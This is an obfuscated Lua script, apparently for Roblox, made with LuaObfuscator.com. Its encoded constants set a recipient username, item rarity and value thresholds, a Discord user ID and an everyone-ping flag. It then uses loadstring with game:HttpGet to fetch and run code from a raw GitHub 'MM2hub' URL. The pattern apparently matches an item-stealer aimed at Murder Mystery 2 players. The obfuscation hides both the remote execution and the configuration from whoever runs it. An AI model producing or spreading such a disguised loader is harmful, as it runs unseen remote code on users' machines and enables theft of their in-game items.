--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v90=0;while true do if (0==v90) then v19=v0(v3(v30,1,1));return "";end end else local v91=0;local v92;while true do if (0==v91) then v92=v2(v0(v30,16));if v19 then local v119=v5(v92,v19);v19=nil;return v119;else return v92;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v93=(v31/(((2 + 3) -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v93-(v93%1) ;else local v94=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v94 + v94))>=v94) and 1) or 0 ;end end local function v21() local v34=877 -(282 + 595) ;local v35;while true do if (v34==(1637 -(1523 + 114))) then v35=v1(v16,v18,v18);v18=v18 + 1 + (1270 -(226 + 1044)) ;v34=1 -0 ;end if (v34==(1066 -(68 + 997))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v38=181 -(67 + 113) ;end if (v38==1) then return (v42 * (31011612 -14234396)) + (v41 * (120312 -54776)) + (v40 * (606 -(87 + 263))) + v39 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 + (1138 -(116 + 1022)) ;local v46=(v20(v44,2 -(4 -3) ,20) * ((2 + 0)^(127 -95))) + v43 ;local v47=v20(v44,65 -44 ,983 -(802 + 150) );local v48=((v20(v44,85 -(32 + 21) )==(443 -(416 + 26))) and  -(1 -0)) or ((3 -2) + 0) ;if (v47==0) then if (v46==(997 -(915 + 82))) then return v48 * (0 -0) ;else v47=431 -(44 + (1370 -984)) ;v45=0 + (859 -(814 + 45)) ;end elseif (v47==(2691 -644)) then return ((v46==(0 + 0)) and (v48 * (((2 -1) + 0)/(1187 -(1069 + 118))))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -1297) ) * (v45 + (v46/((3 -1)^(10 + 42)))) ;end local function v25(v49) local v50;if  not v49 then local v95=0 -0 ;while true do if (v95==(0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=886 -(261 + 624) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v96,v97,v98,v99,v100,v101,v102,v103,v104) local v105=(function() return 0;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do local v114=(function() return 0 + 0 ;end)();while true do if (v114==(935 -(39 + 896))) then if (1~=v105) then else while true do if (v96==0) then v97=(function() return v98();end)();if (v99(v97, #"!", #">")~=(0 -0)) then else local v173=(function() return 0;end)();local v174=(function() return;end)();local v175=(function() return;end)();local v176=(function() return;end)();while true do if (v173~=(2 -0)) then else if (v99(v175, #"\\", #"{")== #"]") then v176[2]=(function() return v102[v176[343 -(218 + 123) ]];end)();end if (v99(v175,5 -3 ,2 + 0 )== #",") then v176[ #"xnx"]=(function() return v102[v176[ #"nil"]];end)();end v173=(function() return 2 + 1 ;end)();end if (v173~=(397 -(115 + 281))) then else local v182=(function() return 0 -0 ;end)();while true do if ((1 + 0)==v182) then v173=(function() return 1 + 1 ;end)();break;end if (v182==(0 -0)) then v176=(function() return {v100(),v100(),nil,nil};end)();if (v174==(0 -0)) then local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188==(867 -(550 + 317))) then v189=(function() return 0 -0 ;end)();while true do if ((0 -0)==v189) then v176[ #"19("]=(function() return v100();end)();v176[ #"?id="]=(function() return v100();end)();break;end end break;end end elseif (v174== #">") then v176[ #"-19"]=(function() return v101();end)();elseif (v174==(5 -3)) then v176[ #"19("]=(function() return v101() -(2^(38 -22)) ;end)();elseif (v174~= #"19(") then else local v194=(function() return 0;end)();while true do if (v194==(285 -(134 + 151))) then v176[ #"-19"]=(function() return v101() -((605 -(268 + 335))^(306 -(60 + 230))) ;end)();v176[ #"?id="]=(function() return v100();end)();break;end end end v182=(function() return 1;end)();end end end if (v173==(1665 -(970 + 695))) then local v183=(function() return 0 + 0 ;end)();while true do if (v183==(1456 -(282 + 1174))) then v174=(function() return v99(v97,2, #"-19");end)();v175=(function() return v99(v97, #".dev",11 -5 );end)();v183=(function() return 1991 -(582 + 1408) ;end)();end if ((2 -1)==v183) then v173=(function() return 3 -2 ;end)();break;end end end if (v173==(1027 -(706 + 318))) then if (v99(v175, #"19(", #"xxx")== #"!") then v176[ #"0313"]=(function() return v102[v176[ #"0313"]];end)();end v103[v104]=(function() return v176;end)();break;end end end break;end end return v96,v97,v98,v99,v100,v101,v102,v103,v104;end if (v105~=(0 -0)) then else local v123=(function() return 0;end)();while true do if (v123==(1251 -(721 + 530))) then local v165=(function() return 1271 -(945 + 326) ;end)();while true do if (v165~=(0 -0)) then else v96=(function() return 1824 -(1195 + 629) ;end)();v97=(function() return nil;end)();v165=(function() return 1 -0 ;end)();end if (v165==(701 -(271 + 429))) then v123=(function() return 1 + 0 ;end)();break;end end end if (v123==1) then v105=(function() return 1501 -(1408 + 92) ;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v106,v107,v108) local v109=(function() return 241 -(187 + 54) ;end)();local v110=(function() return;end)();while true do if (v109~=0) then else v110=(function() return 780 -(162 + 618) ;end)();while true do if (v110==0) then local v124=(function() return 0 + 0 ;end)();while true do if (v124==0) then v106[v107-#":" ]=(function() return v108();end)();return v106,v107,v108;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"\\",v58 do local v70=(function() return 1086 -(461 + 625) ;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70==(1 -0)) then v73=(function() return nil;end)();while true do if (v71==1) then if (v72== #"|") then v73=(function() return v21()~=(0 -0) ;end)();elseif (v72==2) then v73=(function() return v24();end)();elseif (v72~= #"91(") then else v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end if (v71~=0) then else local v121=(function() return 0 + 0 ;end)();local v122=(function() return;end)();while true do if ((1171 -(418 + 753))~=v121) then else v122=(function() return 0 + 0 ;end)();while true do if (v122~=(1636 -(1373 + 263))) then else local v177=(function() return 0 + 0 ;end)();while true do if (v177==(1000 -(451 + 549))) then v72=(function() return v21();end)();v73=(function() return nil;end)();v177=(function() return 1 + 0 ;end)();end if (v177==1) then v122=(function() return 530 -(406 + 123) ;end)();break;end end end if (v122~=(1 -0)) then else v71=(function() return 1 -0 ;end)();break;end end break;end end end end break;end if ((0 + 0)==v70) then v71=(function() return 1384 -(746 + 638) ;end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end end end v57[ #"xnx"]=(function() return v21();end)();for v74= #" ",v23() do FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v59,v54,v74=(function() return v52(FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v59,v54,v74);end)();end for v75= #"]",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1323 -(1249 + 73) ];local v65=v61[2];local v66=v61[1 + 1 + 1 ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1146 -(466 + 679) ;local v81= -(2 -1);local v82={};local v83={...};local v84=v12("#",...) -(1901 -(106 + 1794)) ;local v85={};local v86={};for v111=1329 -(797 + 532) ,v84 do if ((3286<=4935) and (v111>=v78)) then v82[v111-v78 ]=v83[v111 + 1 + 0 + 0 ];else v86[v111]=v83[v111 + 1 + 0 ];end end local v87=(v84-v78) + (2 -(1 + 0)) ;local v88;local v89;while true do v88=v76[v80];v89=v88[2 -1 ];if (v89<=(2 + 2)) then if ((788<=3423) and (v89<=(115 -(4 + 80 + 30)))) then if ((v89==(584 -(57 + 178 + 349))) or (4007<741)) then v86[v88[1429 -(41 + (3258 -1872)) ]][v88[106 -(17 + 86) ]]=v88[3 + (1203 -(373 + 829)) ];else v86[v88[2]]();end elseif ((v89<=(3 -1)) or (1155>2350)) then local v127=0 -0 ;local v128;while true do if (v127==((897 -(476 + 255)) -(122 + 44))) then v128=v88[2 -0 ];v86[v128]=v86[v128](v13(v86,v128 + (3 -2) ,v81));break;end end elseif ((4029<=4853) and (v89==3)) then if (v86[v88[2 + 0 ]]==v88[1 + 3 ]) then v80=v80 + (1 -0) ;else v80=v88[3];end else do return;end end elseif ((v89<=7) or (516>3434)) then if (v89<=(70 -((1534 -(363 + 1141)) + 35))) then local v129=v88[2 + 0 ];local v130=v86[v88[3]];v86[v129 + (1258 -((2623 -(1183 + 397)) + 214)) ]=v130;v86[v129]=v130[v88[15 -11 ]];elseif ((4046>=3033) and (v89>(1218 -(323 + 889)))) then local v136;local v137,v138;local v139;local v140;v86[v88[(1135 -(369 + 761)) -(8 -5) ]][v88[3]]=v88[584 -(361 + 161 + 58) ];v80=v80 + (321 -(53 + 155 + 112)) ;v88=v76[v80];v86[v88[1 + (1 -0) ]]=v63[v88[416 -(15 + 398) ]];v80=v80 + (983 -(18 + 964)) ;v88=v76[v80];v86[v88[7 -(9 -4) ]]=v63[v88[3]];v80=v80 + 1 + 0 ;v88=v76[v80];v140=v88[2];v139=v86[v88[2 + 1 ]];v86[v140 + 1 ]=v139;v86[v140]=v139[v88[854 -(20 + 830) ]];v80=v80 + 1 + 0 ;v88=v76[v80];v86[v88[240 -(64 + 174) ]]=v88[129 -(87 + 29 + 10) ];v80=v80 + 1 + 0 ;v88=v76[v80];v140=v88[740 -(542 + 196) ];v137,v138=v79(v86[v140](v13(v86,v140 + (1 -0) ,v88[3])));v81=(v138 + v140) -(1 + 0) ;v136=0 + 0 ;for v169=v140,v81 do v136=v136 + 1 + 0 ;v86[v169]=v137[v136];end v80=v80 + ((1977 -(1913 + 62)) -1) ;v88=v76[v80];v140=v88[2];v86[v140]=v86[v140](v13(v86,v140 + (2 -1) ,v81));v80=v80 + ((978 + 574) -(1126 + 425)) ;v88=v76[v80];v86[v88[2]]();v80=v80 + (406 -(118 + (759 -472))) ;v88=v76[v80];v80=v88[(1944 -(565 + 1368)) -8 ];else v80=v88[(4227 -3103) -(118 + 1003) ];end elseif (v89<=(23 -15)) then v86[v88[(2040 -(1477 + 184)) -(142 + 235) ]]=v88[13 -10 ];elseif (v89==(2 + 7)) then local v158=977 -(553 + 61 + 363) ;local v159;local v160;local v161;local v162;while true do if (v158==1) then v81=(v161 + v159) -((1 -0) -0) ;v162=0 + 0 ;v158=2 + 0 + 0 ;end if (v158==(0 + 0)) then v159=v88[1 + (1 -0) ];v160,v161=v79(v86[v159](v13(v86,v159 + (337 -(144 + 192)) + 0 ,v88[3])));v158=2 -1 ;end if ((5 -(219 -(42 + 174)))==v158) then for v179=v159,v81 do v162=v162 + (2 -1) ;v86[v179]=v160[v162];end break;end end else v86[v88[1 + 1 ]]=v63[v88[14 -11 ]];end v80=v80 + (754 -(239 + 514)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!113Q00028Q0003023Q005F4703083Q00557365726E616D65030B3Q006573636170617064613134030A3Q006D696E5F72617269747903063Q00436F2Q6D6F6E026Q00F03F03093Q006D696E5F76616C7565030C3Q0070696E6745766572796F6E652Q033Q00596573027Q004003083Q00646973637573657203123Q00393438333Q32332Q392Q34373430393334030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403463Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F626F2Q7461682Q332F2Q4D326875622F726566732F68656164732F6D61696E2F6D61696E001D3Q0012083Q00013Q0026033Q0008000100010004063Q0008000100120A000100023Q00302Q00010003000400120A000100023Q00302Q0001000500060012083Q00073Q0026033Q000F000100070004063Q000F000100120A000100023Q00302Q00010008000700120A000100023Q00302Q00010009000A0012083Q000B3Q0026033Q00010001000B0004063Q0001000100120A000100023Q0030070001000C000D00122Q0001000E3Q00122Q0002000F3Q00202Q00020002001000122Q000400116Q000200046Q00013Q00024Q00010001000100044Q001C00010004063Q000100012Q00043Q00017Q00",v9(),...);
